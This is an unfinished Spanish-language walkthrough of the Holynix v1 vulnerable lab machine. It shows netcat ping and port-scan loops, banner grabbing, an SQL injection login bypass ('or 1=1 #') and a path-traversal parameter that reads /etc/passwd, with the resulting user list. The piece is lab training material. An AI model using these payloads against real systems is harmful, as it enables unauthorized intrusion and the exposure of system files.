Holynix_v1
Apuntes Incompletos.
Voy a ser un poco cabroncete y voy a intentar no utilizar herramientas.
ni siquiera nmap
Voy a ser un poco cabroncete y voy a intentar no utilizar herramientas.
Para empezar voy a hacer un barrido ping mediante un comando de una sola linea:
for i in 192.168.56.{1..254};do(ping -w99 -c1 $i>/dev/null&&echo $i||echo -n +);done
Hoy no tengo ganas de explicarlo. (quizas otro dia)
em50l@jejo.es$ \
for i in 192.168.56.{1..254};do(ping -w99 -c1 $i>/dev/null&&echo $i||echo -n +);done
192.168.56.1
+++++++++++++++++++++++++++++++++++++++
**Ups... el barrido ping no ve ninguna IP**
Veamos a ver que pasa su rastreo ips con el puerto 80 abierto.
`for i in 192.168.56.{1..254};do(nc -zv $i 80 2>&1|grep succeeded||echo -n +);done`
em50l@jejo.es$ \
for i in 192.168.56.{1..254};do(nc -zv $i 80 2>&1|grep succeeded||echo -n +);done
++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++
Connection to 192.168.56.101 80 port [tcp/http] succeeded!
++++++++++++++++++++++++++++++++++++++++++++++
Bien por fin tenemos algo. la ip es la 192.168.56.101
Vamos a ver cuantos puertos tiene abiertos.
for i in {1..1024};do(nc -zv 192.168.56.101 $i 2>&1|grep succeeded||echo -n +);done
em50l@jejo.es$ \
for i in {1..1024};do(nc -zv 192.168.56.101 $i 2>&1|grep succeeded||echo -n +);done
++++++++++++++++++++++++++++++++++++++++++++++++
Connection to 192.168.56.101 80 port [tcp/http] succeeded!
++++++++++++++++++++++++++++++++++++++++++++++++
Ups solo el puerto 80 ….
Nota: El puerto 80 es el de las paginas web.
Vamos a ver que servidor tiene: curl -I 192.168.56.101
em50l@jejo.es$ curl -I 192.168.56.101 HTTP/1.1 200 OK Date: Fri, 18 Nov 2011 16:04:38 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Type: text/htmlHumm…. Por fin algo de informacion.
- Apache 2.2.8
- Ubuntu 5.12
- PHP 5.2.4
Vamos a ver que pagina sale en el navegador con http://192.168.56.101/
Humm un formulario de acceso;
Me registro en la pagina con la inyeccion sql
' or 1=1 #
en la pagina http://192.168.56.101/index.php?page=ssp.php
modifico los parametros post para obtener el archivo /etc/passwd
asi tengo los usuarios del sistema.
text_file_name=%2F../../../etc/passwd&B=Display+File
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash
Tambien me interesa ver el codito a ver si saco algo de informacion.
Pruebo con: text_file_name=ssp%2F/../index.php&B=Display+File